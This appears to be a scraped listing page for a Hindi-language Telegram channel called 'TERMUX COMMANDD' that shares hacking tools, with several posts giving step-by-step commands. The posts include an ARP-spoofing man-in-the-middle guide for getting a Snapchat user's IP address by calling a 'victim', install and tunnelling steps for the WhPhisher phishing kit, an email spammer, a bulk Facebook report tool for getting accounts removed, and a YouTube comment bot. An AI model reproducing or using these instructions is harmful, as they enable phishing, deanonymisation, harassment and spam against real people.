Get Mystery Box with random crypto!

TERMUX COMMANDD

टेलीग्राम चैनल का लोगो termuxcommandd — TERMUX COMMANDD T
टेलीग्राम चैनल का लोगो termuxcommandd — TERMUX COMMANDD
चैनल का पता: @termuxcommandd
श्रेणियाँ: प्रौद्योगिकियों
भाषा: हिंदी
ग्राहकों: 18.54K
चैनल से विवरण

WE SHARE THE BEST HACKING TOOLS ✅
❗️DISCLAIMER ⚠️ THIS CHANNEL DOES NOT ENCOURAGE ANY ILLEGAL ACTIVITIES, ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLY.
FOR ADS ONLY - @ROWANDRAKE

Ratings & Reviews

3.00

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

0

4 stars

2

3 stars

0

2 stars

0

1 stars

1


नवीनतम संदेश 3

2022-10-09 08:02:03 How To Get IP Address Of Any Snapchat User

Easy MITM Attack

Required:
- Mac OS X / Kali Linux ( Or Any UNIX )
- A Phone Where You Have Snapchat On ( Im Assuming Its A Phone )
- Nmap
- Some Tools And Little MITM Knowledge !

Here Is The Tut:

Download Wireshark
Here
Download Arpspoof Here - MACOS only - Kali Linux Has This Already!

1. Fire Up Terminal And Ip Forward Your Laptop/pc With This Scripts:
Kali -
sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Mac - sudo sysctl -w net.inet.ip.forwarding=1

2. Find Your Phone Device Local Ip And Write It Down.
Nmap -sn /24
Ex. nmap -sn (or -sP) 192.168.0.1/24

3. Spoof Your Phone.
arpspoof -i -t gateway
Ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1

4. Fire up wireshark and filter On Your Phone Ip With Stun Protocol
ip.addr == && stun
Ex: ip.addr == 192.168.0.160 && stun

5. Call Your Victim On Snap And Keep Calling Him For Around 5 Seconds.

They Do Not Need Necessary To Answer
You Will See On Wireshark Some Binding Requests, Then Some Other Stun Ones.


ENJOY @TERMUXCOMMANDD
228 viewsedited  05:02
ओपन / कमेंट
2022-10-08 20:21:08
YouTube Auto Commenter Tutorial Video
ENJOY @TERMUXCOMMANDD
527 views17:21
ओपन / कमेंट
2022-10-08 20:21:08 Youtube-Auto-Commenter
Youtube Bot Auto Commenter Using Puppeter and NodeJS

Run / Installation
How to run ?
> git clone https://github.com/tegal1337/Youtube-Auto-Commenter/
> cd Youtube-Auto-Commenter
> npm install
> node main.js

dont forget to change the google username and password in config.js
module.exports = {
keywords: "keywords",
usernamegoogle: "username",
passwordgoogle: "pass",
};

Requirements
Windows / Linux
Google Chrome
a Youtube account

Running on android
but you need ubuntu installed on your android , use Termux for it! and install ubuntu desktop with Andronix i prefer ubuntu 20 , cuz it's more stable than 18
command for installing inside the ubuntu


> apt instal
> apt update
> apt upgrade
> apt install chromium-browser
> apt install npm
> npm install -g n
> n install lts
> hash -r
> apt install curl
> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
> echo "deb https://dl.yarnpkg.com/debian/ stable main" | tee /etc/apt/sources.list.d/yarn.list
> apt install yarn

go to directory of this project , then install the dependency
yarn
also you need to change executableFilePath in main.js you can set to /usr/bin/chromium
523 views17:21
ओपन / कमेंट
2022-10-08 06:47:21
Youtube Bot Auto Comment
Coming sooon
1.3K viewsedited  03:47
ओपन / कमेंट
2022-10-08 06:35:08
FBREPORT
Remove Facebook Account ( Bulk Report )

Command line
$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/bhikandeshmukh/fbreport.git
$ cd fbreport
$ ls
$ unzip Report.zip
$ python2 Report.py

ENJOY @TERMUXCOMMANDD
1.3K viewsedited  03:35
ओपन / कमेंट
2022-10-07 23:14:18
WHPHISHER
The best tool for phishing with the most famous pages updated.

Tested on:
Termux, Kali Linux and debian

Steps
To make this tool less likely to fail, it is advised to install the latest version of Termux, and the Termux API.

How to install --
pkg install bash
pkg install git
git clone https://github.com/WhBeatZ/WhPhisher.git
cd WhPhisher
chmod +x *
bash requisitoswh.sh

Solution if the link is not generated or does not work (2 solutions)
- - - Solution 1 - - -
Open new session
cd NgrokWh
chmod +x ngrokwh.sh
./ngrokwh.sh
and
ngrok http 8080

Solution 2 - - -
Steps:
We open a new session
cd
pkg install openssh -y
ssh -R 80:localhost:8080 nokey@localhost.run

ENJOY @TERMUXCOMMANDD
1.4K viewsedited  20:14
ओपन / कमेंट
2022-10-07 13:35:42
Install with pypi

pip install sendtomail

## Usage
from sendtomail import *
for i in range(10):
server.send(region, email, text)
# All Regions: de, uk, us, it, es, tw, cn, ar, au

## Example
>>> from sendtomail import *
>>> server.send("us", "he1zen@null.net", "hello, its a test message!")
b'200'
>>>

## Status codes
200 - Succesfully send
400 - bad options
429 - Too Many emails sended
500 - Internal Server Error
503 - Service Unavailable


Enter a command to start Email-Spamer
Custom Email (custom_spam.py):
cd Email-Spammer
python custom_spam.py

Data Email (data_email.py):
cd Email-Spammer
python data_email.py

ENJOY @TERMUXCOMMANDD
1.6K views10:35
ओपन / कमेंट
2022-10-07 13:35:42
EMAIL- SPAMMER
Great script for sending and spaming emails! gmail, yahoo, outlook, hotmail.

Install
apt updade
apt upgrate
pkg install git
pkg install python
git clone https://github.com/mishakorzik/Email-Spammer
pip3 install requests
pip3 install smtp

Need help with installation
1. If you have problems installing the requests library: python3 -m pip install requests, smtp
2. If modules cannot be downloaded: replace pkg with apt
3. If you do not know how to delete the repository: rm -rf Email-Spammer
4. if nothing helped you, then you can use the alternative below
1.5K views10:35
ओपन / कमेंट
2022-10-07 05:38:42
MAILFINDER
tool for finding email by first and last name

HOW TO INSTALL
apt update
apt upgrade
apt install git
apt install python
pip3 install requests
git clone https://github.com/mishakorzik/MailFinder

Need help with installation
1. If you have problems installing the requests library: python3 -m pip install requests.
2. If modules cannot be downloaded: replace pkg with apt.
3. If you do not know how to delete the repository: rm -rf MailFinder.


HOW TO START
cd MailFinder
python MailFinder.py

ENJOY @TERMUXCOMMANDD
1.7K views02:38
ओपन / कमेंट
2022-10-06 18:01:59
FREE- PROXY
Hi there will be a lot of proxies here.

Installing for termux
pkg install git
git clone https://github.com/mishakorzik/Free-Proxy
cd Free-Proxy
bash Setup.sh
/succes

Installing for linux
pkg install git
git clone https://github.com/mishakorzik/Free-Proxy
cd Free-Proxy
bash SetupLinux.sh

Enter a command to start the proxy.
bash FreeProxy.sh

command for update tool.
bash Update.sh

ENJOY @TERMUXCOMMANDD
1.8K views15:01
ओपन / कमेंट